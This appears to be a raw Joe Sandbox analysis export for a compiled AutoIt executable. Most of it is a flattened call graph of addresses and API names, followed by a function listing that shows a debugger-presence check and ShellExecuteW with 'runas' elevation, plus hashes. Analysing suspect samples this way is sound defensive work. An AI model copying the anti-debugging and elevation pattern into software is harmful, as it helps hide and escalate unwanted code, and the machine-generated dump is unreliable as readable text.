94141 7ff7ec126d2c LoadLibraryA 94140->94141 94142 7ff7ec126ce3 94140->94142 94141->94142 94143 7ff7ec126d41 GetProcAddress 94141->94143 94142->93959 94142->93960 94143->94142 94144->93969 94148 7ff7ec154c7c 94145->94148 94149 7ff7ec12680a 94148->94149 94150 7ff7ec154ca6 94148->94150 94149->93983 94150->94149 94151 7ff7ec154cd7 94150->94151 94152 
7ff7ec154cb5 __scrt_fastfail 94150->94152 94163 7ff7ec14df54 EnterCriticalSection 94151->94163 94161 7ff7ec1555d4 15 API calls _set_fmode 94152->94161 94156 7ff7ec154cca 94162 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 94156->94162 94161->94156 94162->94149 94167 7ff7ec1547bc 94164->94167 94166 7ff7ec1a2210 94166->93985 94170 7ff7ec154724 94167->94170 94171 7ff7ec154746 94170->94171 94172 7ff7ec154732 94170->94172 94174 7ff7ec154742 94171->94174 94180 7ff7ec15bef8 6 API calls __crtLCMapStringW 94171->94180 94178 7ff7ec1555d4 15 API calls _set_fmode 94172->94178 94174->94166 94175 7ff7ec154737 94179 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 94175->94179 94178->94175 94179->94174 94180->94174 94181->93856 94183 7ff7ec131a48 94182->94183 94184 7ff7ec131c5f 94182->94184 94187 7ff7ec131a90 94183->94187 94199 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94183->94199 94184->93861 94187->93861 94194 7ff7ec12f1ce 94193->94194 94196 7ff7ec12f1d8 94193->94196 94195 7ff7ec131a30 45 API calls 94194->94195 94195->94196 94196->93871 94197->93869 94198->93865 94200->93884 94201->93887 94202->93883 94203->93890 94204->93892 94205->93904 94206->93903 94209 7ff7ec1a2bae 94207->94209 94208 7ff7ec1a240c 32 API calls 94208->94209 94209->94208 94210 7ff7ec1a29da 94209->94210 94211 7ff7ec1267d8 45 API calls 94209->94211 94210->93910 94210->93923 94211->94209 94213 7ff7ec1a1d71 94212->94213 94214 7ff7ec1a1d61 94212->94214 94216 7ff7ec1a1dbf 94213->94216 94217 7ff7ec1548e0 89 API calls 94213->94217 94224 7ff7ec1a1d7a 94213->94224 94215 7ff7ec1548e0 89 API calls 94214->94215 94215->94213 94239 7ff7ec1a2038 94216->94239 94219 7ff7ec1a1d9e 94217->94219 94219->94216 94221 7ff7ec1a1da7 94219->94221 94220 7ff7ec1a1df5 94222 7ff7ec1a1df9 94220->94222 94223 7ff7ec1a1e1c 94220->94223 94221->94224 94251 7ff7ec154970 94221->94251 94225 7ff7ec1a1e07 94222->94225 94227 7ff7ec154970 62 API calls 94222->94227 
94229 7ff7ec1a1e4a 94223->94229 94230 7ff7ec1a1e2a 94223->94230 94224->93923 94225->94224 94228 7ff7ec154970 62 API calls 94225->94228 94227->94225 94228->94224 94243 7ff7ec1a1e88 94229->94243 94232 7ff7ec1a1e38 94230->94232 94233 7ff7ec154970 62 API calls 94230->94233 94232->94224 94234 7ff7ec154970 62 API calls 94232->94234 94233->94232 94234->94224 94235 7ff7ec1a1e52 94236 7ff7ec1a1e68 94235->94236 94237 7ff7ec154970 62 API calls 94235->94237 94236->94224 94238 7ff7ec154970 62 API calls 94236->94238 94237->94236 94238->94224 94240 7ff7ec1a2069 94239->94240 94242 7ff7ec1a2056 memcpy_s 94239->94242 94241 7ff7ec154c5c _fread_nolock 45 API calls 94240->94241 94241->94242 94242->94220 94244 7ff7ec1a1fb0 94243->94244 94250 7ff7ec1a1eaa 94243->94250 94246 7ff7ec1a1fd3 94244->94246 94265 7ff7ec152a04 60 API calls 2 library calls 94244->94265 94246->94235 94247 7ff7ec1a1bd0 45 API calls 94247->94250 94250->94244 94250->94246 94250->94247 94263 7ff7ec1a1c9c 45 API calls 94250->94263 94264 7ff7ec1a20cc 60 API calls 94250->94264 94252 7ff7ec15498e 94251->94252 94253 7ff7ec1549a3 94251->94253 94267 7ff7ec1555d4 15 API calls _set_fmode 94252->94267 94255 7ff7ec15499e 94253->94255 94266 7ff7ec14df54 EnterCriticalSection 94253->94266 94255->94224 94257 7ff7ec154993 94268 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 94257->94268 94258 7ff7ec1549b9 94260 7ff7ec1548ec 60 API calls 94258->94260 94261 7ff7ec1549c2 94260->94261 94262 7ff7ec14df60 fflush LeaveCriticalSection 94261->94262 94262->94255 94263->94250 94264->94250 94265->94246 94267->94257 94268->94255 94270 7ff7ec168f90 wcsftime 94269->94270 94271 7ff7ec123ec4 GetLongPathNameW 94270->94271 94272 7ff7ec127cf4 4 API calls 94271->94272 94273 7ff7ec123eed 94272->94273 94274 7ff7ec124074 94273->94274 94275 7ff7ec129640 4 API calls 94274->94275 94276 7ff7ec12408e 94275->94276 94277 7ff7ec1256d4 5 API calls 94276->94277 94278 7ff7ec12409b 94277->94278 94279 7ff7ec1240a7 94278->94279 94282 7ff7ec16bada 94278->94282 94281 
7ff7ec124680 4 API calls 94279->94281 94283 7ff7ec1240b5 94281->94283 94285 7ff7ec16bb0f 94282->94285 94321 7ff7ec141ad0 CompareStringW 94282->94321 94317 7ff7ec1240e8 94283->94317 94286 7ff7ec1240cb Concurrency::wait 94286->93790 94288 7ff7ec126460 105 API calls 94287->94288 94289 7ff7ec1263e5 94288->94289 94290 7ff7ec16c656 94289->94290 94291 7ff7ec126460 105 API calls 94289->94291 94292 7ff7ec1a2948 90 API calls 94290->94292 94293 7ff7ec126400 94291->94293 94294 7ff7ec16c66e 94292->94294 94293->94290 94295 7ff7ec126408 94293->94295 94296 7ff7ec16c672 94294->94296 94297 7ff7ec16c690 94294->94297 94299 7ff7ec16c67b 94295->94299 94300 7ff7ec126414 94295->94300 94301 7ff7ec12652c 63 API calls 94296->94301 94298 7ff7ec144c68 4 API calls 94297->94298 94316 7ff7ec16c6dd Concurrency::wait 94298->94316 94323 7ff7ec19c5c8 77 API calls wprintf 94299->94323 94322 7ff7ec12e774 143 API calls Concurrency::wait 94300->94322 94301->94299 94304 7ff7ec16c68a 94304->94297 94305 7ff7ec126438 94305->93783 94306 7ff7ec16c895 94307 7ff7ec12652c 63 API calls 94306->94307 94315 7ff7ec16c8a9 94307->94315 94312 7ff7ec12ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94312->94316 94315->94306 94329 7ff7ec1976d8 77 API calls 3 library calls 94315->94329 94316->94306 94316->94312 94316->94315 94324 7ff7ec197400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94316->94324 94325 7ff7ec19730c 39 API calls 94316->94325 94326 7ff7ec1a0210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94316->94326 94327 7ff7ec12b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94316->94327 94328 7ff7ec129940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94316->94328 94318 7ff7ec124107 94317->94318 94320 7ff7ec124130 memcpy_s 94317->94320 94319 7ff7ec144c68 4 API calls 94318->94319 94319->94320 94320->94286 94321->94282 94322->94305 94323->94304 
94324->94316 94325->94316 94326->94316 94327->94316 94328->94316 94329->94315 94331 7ff7ec129762 94330->94331 94332 7ff7ec12988d 94330->94332 94331->94332 94333 7ff7ec144c68 4 API calls 94331->94333 94332->93795 94334 7ff7ec129791 94333->94334 94335 7ff7ec144c68 4 API calls 94334->94335 94336 7ff7ec12981c 94335->94336 94336->94332 94342 7ff7ec12abe0 81 API calls 2 library calls 94336->94342 94343 7ff7ec129940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94336->94343 94344 7ff7ec12b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94336->94344 94340->93797 94341->93799 94342->94336 94343->94336 94344->94336 94345->93810 94346 7ff7ec132c17 94349 7ff7ec1314a0 94346->94349 94348 7ff7ec132c2a 94350 7ff7ec1314d3 94349->94350 94351 7ff7ec17be31 94350->94351 94354 7ff7ec17bdf2 94350->94354 94355 7ff7ec17bdd1 94350->94355 94381 7ff7ec1314fa __scrt_fastfail 94350->94381 94418 7ff7ec1b8f48 300 API calls 3 library calls 94351->94418 94356 7ff7ec17be19 94354->94356 94416 7ff7ec1b9a88 300 API calls 4 library calls 94354->94416 94357 7ff7ec17bddb 94355->94357 94355->94381 94417 7ff7ec1a34e4 77 API calls 3 library calls 94356->94417 94415 7ff7ec1b9514 300 API calls 94357->94415 94360 7ff7ec131884 94406 7ff7ec142130 45 API calls 94360->94406 94365 7ff7ec131898 94365->94348 94366 7ff7ec131a30 45 API calls 94366->94381 94373 7ff7ec142130 45 API calls 94373->94381 94374 7ff7ec17bfe4 94421 7ff7ec1b93a4 77 API calls 94374->94421 94375 7ff7ec131799 94383 7ff7ec131815 94375->94383 94422 7ff7ec1a34e4 77 API calls 3 library calls 94375->94422 94379 7ff7ec12e0a8 4 API calls 94379->94381 94381->94360 94381->94366 94381->94373 94381->94374 94381->94375 94381->94379 94381->94383 94384 7ff7ec133c20 94381->94384 94405 7ff7ec12ef9c 46 API calls 94381->94405 94407 7ff7ec1420d0 45 API calls 94381->94407 94408 7ff7ec125af8 300 API calls 94381->94408 94409 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 
WaitForSingleObjectEx EnterCriticalSection 94381->94409 94410 7ff7ec1435c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94381->94410 94411 7ff7ec144f0c 34 API calls _onexit 94381->94411 94412 7ff7ec1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94381->94412 94413 7ff7ec1436c4 77 API calls 94381->94413 94414 7ff7ec1437dc 300 API calls 94381->94414 94419 7ff7ec12ee20 5 API calls Concurrency::wait 94381->94419 94420 7ff7ec18ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94381->94420 94383->94348 94401 7ff7ec133c80 94384->94401 94385 7ff7ec1805be 94425 7ff7ec1a34e4 77 API calls 3 library calls 94385->94425 94388 7ff7ec134aa9 94390 7ff7ec134ac0 94388->94390 94393 7ff7ec12e0a8 4 API calls 94388->94393 94389 7ff7ec1805d1 94389->94381 94390->94381 94391 7ff7ec134fe7 94395 7ff7ec12e0a8 4 API calls 94391->94395 94392 7ff7ec133dde 94392->94381 94393->94392 94394 7ff7ec17fefe 94398 7ff7ec12e0a8 4 API calls 94394->94398 94395->94392 94396 7ff7ec12e0a8 4 API calls 94396->94401 94397 7ff7ec134a8f 94397->94388 94397->94390 94397->94394 94398->94390 94400 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94400->94401 94401->94385 94401->94388 94401->94391 94401->94392 94401->94396 94401->94397 94401->94400 94402 7ff7ec129640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94401->94402 94403 7ff7ec1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94401->94403 94404 7ff7ec144f0c 34 API calls __scrt_initialize_thread_safe_statics 94401->94404 94423 7ff7ec135360 300 API calls Concurrency::wait 94401->94423 94424 7ff7ec1a34e4 77 API calls 3 library calls 94401->94424 94402->94401 94403->94401 94404->94401 94405->94381 94406->94365 94407->94381 94408->94381 94410->94381 94411->94381 94413->94381 94414->94381 94415->94383 94416->94356 94417->94351 94418->94381 
94419->94381 94420->94381 94421->94375 94422->94375 94423->94401 94424->94401 94425->94389 94426 7ff7ec132bf8 94429 7ff7ec12ed44 94426->94429 94428 7ff7ec132c05 94430 7ff7ec12ed75 94429->94430 94437 7ff7ec12edcd 94429->94437 94431 7ff7ec133c20 300 API calls 94430->94431 94430->94437 94433 7ff7ec12eda8 94431->94433 94435 7ff7ec12edfe 94433->94435 94438 7ff7ec12ee20 5 API calls Concurrency::wait 94433->94438 94434 7ff7ec17a636 94435->94428 94437->94435 94439 7ff7ec1a34e4 77 API calls 3 library calls 94437->94439 94438->94437 94439->94434 94440 7ff7ec125dec 94441 7ff7ec125df4 94440->94441 94442 7ff7ec125e98 94441->94442 94443 7ff7ec125e28 94441->94443 94465 7ff7ec125e96 94441->94465 94444 7ff7ec16c229 94442->94444 94445 7ff7ec125e9e 94442->94445 94446 7ff7ec125f21 PostQuitMessage 94443->94446 94447 7ff7ec125e35 94443->94447 94496 7ff7ec13ede4 8 API calls 94444->94496 94449 7ff7ec125ecc SetTimer RegisterWindowMessageW 94445->94449 94450 7ff7ec125ea5 94445->94450 94454 7ff7ec125e7c 94446->94454 94451 7ff7ec125e40 94447->94451 94452 7ff7ec16c2af 94447->94452 94448 7ff7ec125e6b DefWindowProcW 94448->94454 94449->94454 94457 7ff7ec125efc CreatePopupMenu 94449->94457 94455 7ff7ec125eae KillTimer 94450->94455 94456 7ff7ec16c1b8 94450->94456 94458 7ff7ec125e49 94451->94458 94459 7ff7ec125f2b 94451->94459 94508 7ff7ec19a40c 16 API calls __scrt_fastfail 94452->94508 94482 7ff7ec125d88 94455->94482 94462 7ff7ec16c1bd 94456->94462 94463 7ff7ec16c1f7 MoveWindow 94456->94463 94457->94454 94458->94465 94472 7ff7ec125f0b 94458->94472 94473 7ff7ec125e5f 94458->94473 94486 7ff7ec144610 94459->94486 94461 7ff7ec16c255 94497 7ff7ec142c44 47 API calls Concurrency::wait 94461->94497 94469 7ff7ec16c1e4 SetFocus 94462->94469 94470 7ff7ec16c1c2 94462->94470 94463->94454 94465->94448 94466 7ff7ec16c2c3 94466->94448 94466->94454 94469->94454 94470->94473 94474 7ff7ec16c1cb 94470->94474 94494 7ff7ec125f3c 26 API calls __scrt_fastfail 94472->94494 94473->94448 94479 7ff7ec125d88 Shell_NotifyIconW 
94473->94479 94495 7ff7ec13ede4 8 API calls 94474->94495 94478 7ff7ec125f1f 94478->94454 94480 7ff7ec16c280 94479->94480 94498 7ff7ec126258 94480->94498 94483 7ff7ec125d99 __scrt_fastfail 94482->94483 94484 7ff7ec125de4 94482->94484 94485 7ff7ec125db8 Shell_NotifyIconW 94483->94485 94493 7ff7ec127098 DeleteObject DestroyWindow Concurrency::wait 94484->94493 94485->94484 94487 7ff7ec14461a __scrt_fastfail 94486->94487 94488 7ff7ec1446db 94486->94488 94509 7ff7ec1272c8 94487->94509 94488->94454 94490 7ff7ec144660 94491 7ff7ec1446a2 KillTimer SetTimer 94490->94491 94492 7ff7ec18aaa1 Shell_NotifyIconW 94490->94492 94491->94488 94492->94491 94493->94454 94494->94478 94495->94454 94496->94461 94497->94473 94499 7ff7ec126287 __scrt_fastfail 94498->94499 94536 7ff7ec1261c4 94499->94536 94502 7ff7ec12632d 94504 7ff7ec12634e Shell_NotifyIconW 94502->94504 94505 7ff7ec16c644 Shell_NotifyIconW 94502->94505 94506 7ff7ec1272c8 6 API calls 94504->94506 94507 7ff7ec126365 94506->94507 94507->94465 94508->94466 94510 7ff7ec1272f4 94509->94510 94529 7ff7ec1273bc Concurrency::wait 94509->94529 94531 7ff7ec1298e8 94510->94531 94512 7ff7ec127303 94513 7ff7ec16cdfc LoadStringW 94512->94513 94514 7ff7ec127310 94512->94514 94516 7ff7ec16ce1e 94513->94516 94515 7ff7ec127cf4 4 API calls 94514->94515 94517 7ff7ec127324 94515->94517 94518 7ff7ec12e0a8 4 API calls 94516->94518 94519 7ff7ec127336 94517->94519 94520 7ff7ec16ce30 94517->94520 94526 7ff7ec12734f __scrt_fastfail wcscpy 94518->94526 94519->94516 94521 7ff7ec127343 94519->94521 94535 7ff7ec127c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94520->94535 94534 7ff7ec127c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94521->94534 94524 7ff7ec16ce3c 94525 7ff7ec1271f8 4 API calls 94524->94525 94524->94526 94527 7ff7ec16ce63 94525->94527 94528 7ff7ec1273a3 Shell_NotifyIconW 94526->94528 94530 7ff7ec1271f8 4 API calls 94527->94530 94528->94529 
94529->94490 94530->94526 94532 7ff7ec144c68 4 API calls 94531->94532 94533 7ff7ec129918 94532->94533 94533->94512 94534->94526 94535->94524 94537 7ff7ec16c5f8 94536->94537 94538 7ff7ec1261e0 94536->94538 94537->94538 94539 7ff7ec16c602 DestroyIcon 94537->94539 94538->94502 94540 7ff7ec19ad94 39 API calls wcsftime 94538->94540 94539->94538 94540->94502 94541 7ff7ec1347e1 94542 7ff7ec134d57 94541->94542 94546 7ff7ec1347f2 94541->94546 94606 7ff7ec12ee20 5 API calls Concurrency::wait 94542->94606 94543 7ff7ec134d66 94607 7ff7ec12ee20 5 API calls Concurrency::wait 94543->94607 94546->94543 94547 7ff7ec134862 94546->94547 94548 7ff7ec134df3 94546->94548 94563 7ff7ec133c80 94547->94563 94571 7ff7ec1366c0 94547->94571 94608 7ff7ec1a0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94548->94608 94551 7ff7ec1805be 94610 7ff7ec1a34e4 77 API calls 3 library calls 94551->94610 94553 7ff7ec134a8f 94555 7ff7ec134aa9 94553->94555 94557 7ff7ec134ac0 94553->94557 94562 7ff7ec17fefe 94553->94562 94555->94557 94560 7ff7ec12e0a8 4 API calls 94555->94560 94556 7ff7ec1805d1 94558 7ff7ec144f0c 34 API calls __scrt_initialize_thread_safe_statics 94558->94563 94559 7ff7ec134fe7 94564 7ff7ec12e0a8 4 API calls 94559->94564 94561 7ff7ec133dde 94560->94561 94566 7ff7ec12e0a8 4 API calls 94562->94566 94563->94551 94563->94553 94563->94555 94563->94558 94563->94559 94563->94561 94565 7ff7ec12e0a8 4 API calls 94563->94565 94568 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94563->94568 94569 7ff7ec129640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94563->94569 94570 7ff7ec1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94563->94570 94605 7ff7ec135360 300 API calls Concurrency::wait 94563->94605 94609 7ff7ec1a34e4 77 API calls 3 library calls 94563->94609 94564->94561 94565->94563 94566->94557 94568->94563 94569->94563 
94570->94563 94596 7ff7ec13673b memcpy_s Concurrency::wait 94571->94596 94573 7ff7ec181fac 94735 7ff7ec1bab30 300 API calls Concurrency::wait 94573->94735 94575 7ff7ec181fbe 94575->94563 94576 7ff7ec136d40 9 API calls 94576->94596 94577 7ff7ec12ec00 4 API calls 94577->94596 94578 7ff7ec136c0f 94579 7ff7ec181fc9 94578->94579 94580 7ff7ec136c3d 94578->94580 94736 7ff7ec1a34e4 77 API calls 3 library calls 94579->94736 94732 7ff7ec12ee20 5 API calls Concurrency::wait 94580->94732 94584 7ff7ec136c4a 94733 7ff7ec141fcc 300 API calls 94584->94733 94587 7ff7ec144c68 4 API calls 94587->94596 94588 7ff7ec1820c1 94597 7ff7ec136b15 94588->94597 94739 7ff7ec1a34e4 77 API calls 3 library calls 94588->94739 94589 7ff7ec136c78 94734 7ff7ec13e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94589->94734 94592 7ff7ec133c20 300 API calls 94592->94596 94593 7ff7ec182032 94737 7ff7ec1a34e4 77 API calls 3 library calls 94593->94737 94595 7ff7ec12e0a8 4 API calls 94595->94596 94596->94573 94596->94576 94596->94577 94596->94578 94596->94579 94596->94584 94596->94587 94596->94588 94596->94589 94596->94592 94596->94593 94596->94595 94596->94597 94611 7ff7ec1bf160 94596->94611 94616 7ff7ec1a5b80 94596->94616 94622 7ff7ec1a63dc 94596->94622 94627 7ff7ec1a8e98 94596->94627 94660 7ff7ec1bf0ac 94596->94660 94663 7ff7ec1a7e48 94596->94663 94697 7ff7ec1a8ea0 94596->94697 94730 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94596->94730 94731 7ff7ec1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94596->94731 94738 7ff7ec1b8d98 49 API calls Concurrency::wait 94596->94738 94597->94563 94605->94563 94606->94543 94607->94548 94608->94563 94609->94563 94610->94556 94740 7ff7ec1bf630 94611->94740 94613 7ff7ec1bf1cd 94613->94596 94614 7ff7ec1bf182 94614->94613 94808 7ff7ec12ee20 5 API calls Concurrency::wait 94614->94808 94617 7ff7ec1a5ba5 94616->94617 94618 7ff7ec1a5ba9 
94617->94618 94619 7ff7ec1a5be5 FindClose 94617->94619 94620 7ff7ec1a5bd5 94617->94620 94618->94596 94619->94618 94620->94618 94860 7ff7ec127ab8 94620->94860 94623 7ff7ec12d4cc 48 API calls 94622->94623 94624 7ff7ec1a63f8 94623->94624 94871 7ff7ec19bdec 94624->94871 94626 7ff7ec1a6404 94626->94596 94628 7ff7ec1aa680 94627->94628 94636 7ff7ec1aa71a 94628->94636 94897 7ff7ec12834c 94628->94897 94631 7ff7ec1aa7fd 94922 7ff7ec1a1864 6 API calls 94631->94922 94632 7ff7ec12d4cc 48 API calls 94633 7ff7ec1aa6d0 94632->94633 94906 7ff7ec126838 94633->94906 94635 7ff7ec1aa6f3 94635->94596 94636->94631 94636->94635 94640 7ff7ec1aa770 94636->94640 94638 7ff7ec1aa805 94923 7ff7ec19b334 94638->94923 94642 7ff7ec12d4cc 48 API calls 94640->94642 94641 7ff7ec1aa6e6 94641->94635 94645 7ff7ec127ab8 CloseHandle 94641->94645 94648 7ff7ec1aa778 94642->94648 94644 7ff7ec1aa7ee 94879 7ff7ec19b3a8 94644->94879 94645->94635 94646 7ff7ec1aa7a7 94649 7ff7ec1298e8 4 API calls 94646->94649 94648->94644 94648->94646 94651 7ff7ec1aa7b5 94649->94651 94650 7ff7ec128314 CloseHandle 94652 7ff7ec1aa85c 94650->94652 94653 7ff7ec12e0a8 4 API calls 94651->94653 94652->94635 94655 7ff7ec127ab8 CloseHandle 94652->94655 94654 7ff7ec1aa7c2 94653->94654 94656 7ff7ec1271f8 4 API calls 94654->94656 94655->94635 94657 7ff7ec1aa7d3 94656->94657 94658 7ff7ec19b3a8 12 API calls 94657->94658 94659 7ff7ec1aa7e0 Concurrency::wait 94658->94659 94659->94635 94659->94650 94661 7ff7ec1bf630 164 API calls 94660->94661 94662 7ff7ec1bf0c2 94661->94662 94662->94596 94664 7ff7ec1a7e79 94663->94664 94665 7ff7ec129640 4 API calls 94664->94665 94694 7ff7ec1a7f55 Concurrency::wait 94664->94694 94666 7ff7ec1a7ea6 94665->94666 94668 7ff7ec129640 4 API calls 94666->94668 94667 7ff7ec12834c 5 API calls 94669 7ff7ec1a7f99 94667->94669 94670 7ff7ec1a7eaf 94668->94670 94671 7ff7ec12d4cc 48 API calls 94669->94671 94672 7ff7ec12d4cc 48 API calls 94670->94672 94673 7ff7ec1a7fab 94671->94673 94674 7ff7ec1a7ebe 94672->94674 94675 7ff7ec126838 
16 API calls 94673->94675 94942 7ff7ec1274ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94674->94942 94676 7ff7ec1a7fba 94675->94676 94678 7ff7ec1a7fbe GetLastError 94676->94678 94683 7ff7ec1a7ff5 94676->94683 94680 7ff7ec1a7fd8 94678->94680 94679 7ff7ec1a7ed8 94943 7ff7ec127c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94679->94943 94686 7ff7ec127ab8 CloseHandle 94680->94686 94690 7ff7ec1a7fe5 94680->94690 94682 7ff7ec1a7f07 94682->94694 94944 7ff7ec19bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 94682->94944 94684 7ff7ec129640 4 API calls 94683->94684 94687 7ff7ec1a8035 94684->94687 94686->94690 94687->94690 94946 7ff7ec190d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94687->94946 94688 7ff7ec1a7f17 94689 7ff7ec1a7f1b 94688->94689 94688->94694 94692 7ff7ec12ec00 4 API calls 94689->94692 94690->94596 94693 7ff7ec1a7f28 94692->94693 94945 7ff7ec19bab8 8 API calls Concurrency::wait 94693->94945 94694->94667 94694->94690 94696 7ff7ec1a7f31 Concurrency::wait 94696->94694 94698 7ff7ec1aa680 94697->94698 94700 7ff7ec12834c 5 API calls 94698->94700 94706 7ff7ec1aa71a 94698->94706 94699 7ff7ec1aa6f3 94699->94596 94701 7ff7ec1aa6be 94700->94701 94703 7ff7ec12d4cc 48 API calls 94701->94703 94702 7ff7ec1aa7fd 94947 7ff7ec1a1864 6 API calls 94702->94947 94704 7ff7ec1aa6d0 94703->94704 94707 7ff7ec126838 16 API calls 94704->94707 94706->94699 94706->94702 94709 7ff7ec1aa770 94706->94709 94708 7ff7ec1aa6e2 94707->94708 94708->94706 94710 7ff7ec1aa6e6 94708->94710 94712 7ff7ec12d4cc 48 API calls 94709->94712 94710->94699 94715 7ff7ec127ab8 CloseHandle 94710->94715 94711 7ff7ec1aa805 94713 7ff7ec19b334 4 API calls 94711->94713 94718 7ff7ec1aa778 94712->94718 94729 7ff7ec1aa7e0 Concurrency::wait 94713->94729 94714 7ff7ec1aa7ee 94717 7ff7ec19b3a8 12 API calls 94714->94717 94715->94699 94716 7ff7ec1aa7a7 94719 7ff7ec1298e8 4 API 

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC1237F2
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123807
                                                            • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC12388D
                                                              • Part of subcall function 00007FF7EC123F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7EC1238BF,?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123FFD
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123924
                                                            • MessageBoxA.USER32 ref: 00007FF7EC16B888
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC16B8E1
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC16B968
                                                            • ShellExecuteW.SHELL32 ref: 00007FF7EC16B98F
                                                              • Part of subcall function 00007FF7EC123B84: GetSysColorBrush.USER32 ref: 00007FF7EC123B9E
                                                              • Part of subcall function 00007FF7EC123B84: LoadCursorW.USER32 ref: 00007FF7EC123BAE
                                                              • Part of subcall function 00007FF7EC123B84: LoadIconW.USER32 ref: 00007FF7EC123BC3
                                                              • Part of subcall function 00007FF7EC123B84: LoadIconW.USER32 ref: 00007FF7EC123BDC
                                                              • Part of subcall function 00007FF7EC123B84: LoadIconW.USER32 ref: 00007FF7EC123BF5
                                                              • Part of subcall function 00007FF7EC123B84: LoadImageW.USER32 ref: 00007FF7EC123C21
                                                              • Part of subcall function 00007FF7EC123B84: RegisterClassExW.USER32 ref: 00007FF7EC123C85
                                                              • Part of subcall function 00007FF7EC123CBC: CreateWindowExW.USER32 ref: 00007FF7EC123D0C
                                                              • Part of subcall function 00007FF7EC123CBC: CreateWindowExW.USER32 ref: 00007FF7EC123D5F
                                                              • Part of subcall function 00007FF7EC123CBC: ShowWindow.USER32 ref: 00007FF7EC123D75
                                                              • Part of subcall function 00007FF7EC126258: Shell_NotifyIconW.SHELL32 ref: 00007FF7EC126350
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 1593035822-3287110873
                                                            • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                            • Instruction ID: be80b0f80cd397c992bedfcf9fc297171692c9c84eadc267af4dfb4f9409be84
                                                            • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                            • Instruction Fuzzy Hash: 1B711BADA1C68395FA24BB21F8803B9E768AF45344FC00137E55D062A6DE7CE509D332

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
